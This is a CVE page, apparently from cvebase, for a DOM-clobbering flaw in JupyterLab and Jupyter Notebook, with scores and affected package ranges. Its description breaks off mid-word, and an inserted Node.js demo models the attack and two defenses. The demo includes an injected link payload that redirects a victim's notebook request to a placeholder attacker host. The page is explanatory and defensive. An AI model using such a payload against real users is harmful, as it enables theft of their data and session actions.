CVE-2024-43805 Cross-site Scripting in JupyterLab

Severity
NVD: 6.1 MEDIUM
CNA: 7.6
EPSS
0.4% (top 37.48%)
CISA KEV
Not in KEV
Exploit
No known exploits
Timeline
Published: Aug 28
Latest update: Aug 29

Description

jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture. Exploitation requires user interaction: the victim must open a malicious notebook containing Markdown cells, or a malicious Markdown file using the JupyterLab preview feature. The underlying flaw is HTML injection in rendered Markdown that leads to DOM clobbering (the title the GHSA, OSV and CVEList entries on this page use). A malicious user can then access any data that the attacked user has access to, as well as perform arbitrary requests acting as the attacked user. JupyterLab v3.6.8, v4.2.5 and Jupyter Notebook v7.2.2 have been patched to resol
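The mechanism behind the description above, as an added example that is not code from JupyterLab, the advisory or cvebase: a Node.js model of how an HTML element injected through rendered Markdown clobbers a page-level name (DOM clobbering), how a script that trusts that name ends up sending the victim's request to an attacker-chosen URL, and two independent defenses. The global `apiBase`, the default API URL, the attacker host and the HTML snippets are constructed placeholders, and the `win`/`doc` objects are a simplified model of the HTML named-property rules, not a real DOM.

```javascript
// Added example, not code from JupyterLab or the advisory: a Node.js model of how an
// injected HTML element clobbers a page-level name, and two independent defenses.
// Labelled assumptions: the HTML snippets are constructed; "win"/"doc" are a simplified
// model of the HTML named-property rules, not a real DOM; the global `apiBase`, the
// default URL and the attacker host are hypothetical names used only for illustration.

const DEFAULT_API_BASE = "https://notebook.example/api/"; // assumed default, not JupyterLab's

// Elements whose `name` is exposed as a named property on window / document (HTML spec).
const WINDOW_NAMED_TAGS = new Set(["embed", "form", "img", "object"]);
const DOCUMENT_NAMED_TAGS = new Set(["embed", "form", "iframe", "img", "object"]);

// Tiny start-tag tokenizer for the constructed inputs. Illustrative only: a production
// sanitizer must work on a parsed tree (for example DOMPurify), never on regexes.
function extractElements(html) {
  const elements = [];
  const tagRe = /<([a-z][a-z0-9-]*)\b([^>]*?)\/?>/gi;
  const attrRe = /([a-z_:][-a-z0-9_:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  let t;
  while ((t = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(t[2])) !== null) attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    elements.push({ tag: t[1].toLowerCase(), attrs });
  }
  return elements;
}

// Anchors and areas stringify to their href in browsers; that is what lets an injected
// <a id=...> stand in for a string-typed configuration value.
function makeElement({ tag, attrs }) {
  return {
    tagName: tag.toUpperCase(),
    attrs,
    toString: () => ((tag === "a" || tag === "area") && "href" in attrs ? attrs.href : "[object HTMLElement]"),
  };
}

// The named-property view a script sees once the (sanitized or not) HTML is in the page.
// First element wins here; a real browser returns an HTMLCollection on id collisions.
function modelPage(html) {
  const win = Object.create(null);
  const doc = Object.create(null);
  for (const desc of extractElements(html)) {
    const el = makeElement(desc);
    const { id, name } = desc.attrs;
    if (id && !(id in win)) win[id] = el;
    if (name && WINDOW_NAMED_TAGS.has(desc.tag) && !(name in win)) win[name] = el;
    if (name && DOCUMENT_NAMED_TAGS.has(desc.tag) && !(name in doc)) doc[name] = el;
  }
  return { win, doc };
}

// Vulnerable consumer: falls back to a global the host page may never have defined, so an
// element whose id matches the name is silently accepted and coerced to a string.
function resolveApiBaseVulnerable(win) {
  return String(win.apiBase || DEFAULT_API_BASE);
}

// Defense 1 (consumer side): only accept the expected primitive type; any element object
// produced by clobbering fails the check and the default is used.
function resolveApiBaseHardened(win) {
  return typeof win.apiBase === "string" ? win.apiBase : DEFAULT_API_BASE;
}

// Defense 2 (sanitizer side): namespace every id/name in untrusted HTML so it can no longer
// collide with page globals (the "user-content-" prefix convention). Regex form is for the
// demo only; apply the same rule inside a tree-based sanitizer in real code.
function namespaceNamedAttributes(html, prefix = "user-content-") {
  return html.replace(/(\s)(id|name)\s*=\s*("|')(.*?)\3/gi,
    (_m, ws, attr, q, val) => `${ws}${attr}=${q}${prefix}${val}${q}`);
}

// Walk the attack the advisory describes: Markdown that renders to a link whose id collides
// with a name the host script reads, so the victim's next request goes where the link points.
function demo() {
  // Constructed attacker output; the URL is a placeholder, not a real endpoint.
  const injected = '<a id="apiBase" href="https://attacker.example/collect/">release notes</a>';
  const clobbered = modelPage(injected).win;
  const sanitized = modelPage(namespaceNamedAttributes(injected)).win;
  const requestFor = (base) => new URL("contents/secret.ipynb", base).href;
  return {
    vulnerable: requestFor(resolveApiBaseVulnerable(clobbered)),
    hardened: requestFor(resolveApiBaseHardened(clobbered)),
    sanitizedThenVulnerable: requestFor(resolveApiBaseVulnerable(sanitized)),
  };
}

console.log(demo());
```

In a browser the clobbered read would be `window.apiBase`; the model keeps that shape so both consumers run in Node. The two defenses close different holes and a deployment should apply both: the type check protects code that reads page globals, while the id/name rewrite stops untrusted HTML from minting those globals in the first place, which is the same `user-content-` convention that DOMPurify applies when `SANITIZE_NAMED_PROPS` is enabled.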

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploitability: 2.8 | Impact: 2.7

Affected Packages (6 packages)

Source      Package                 Introduced   Fixed / Affected range
NVD         jupyter/jupyterlab      4.0.0        4.2.5
PyPI        jupyterlab/jupyterlab   4.0.0        4.2.5
Debian      jupyterlab/jupyterlab                < 4.0.11+ds1+~cs11.25.27-3
CVEListV5   jupyterlab                           < 3.6.8; >= 4.0.0, < 4.2.5
CVEListV5   notebook                             >= 7.0.0, <= 7.2.2 (note: the description above names Notebook 7.2.2 as the patched release, which conflicts with this inclusive upper bound)
NVD         jupyter/notebook        7.0.0        7.2.2

Vulnerability Details (4)

GHSA      HTML injection in Jupyter Notebook and JupyterLab leading to DOM Clobbering   2024-08-29
OSV       HTML injection in Jupyter Notebook and JupyterLab leading to DOM Clobbering   2024-08-29
CVEList   HTML injection in Jupyter Notebook and JupyterLab leading to DOM Clobbering   2024-08-28
OSV       CVE-2024-43805: jupyterlab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook Architecture   2024-08-28

Vendor Advisories (1)

Debian    CVE-2024-43805: jupyter-notebook - jupyterlab is an extensible environment for interactive and reproducible computi...   2024
CVE-2024-43805 — Cross-site Scripting in Jupyterlab | cvebase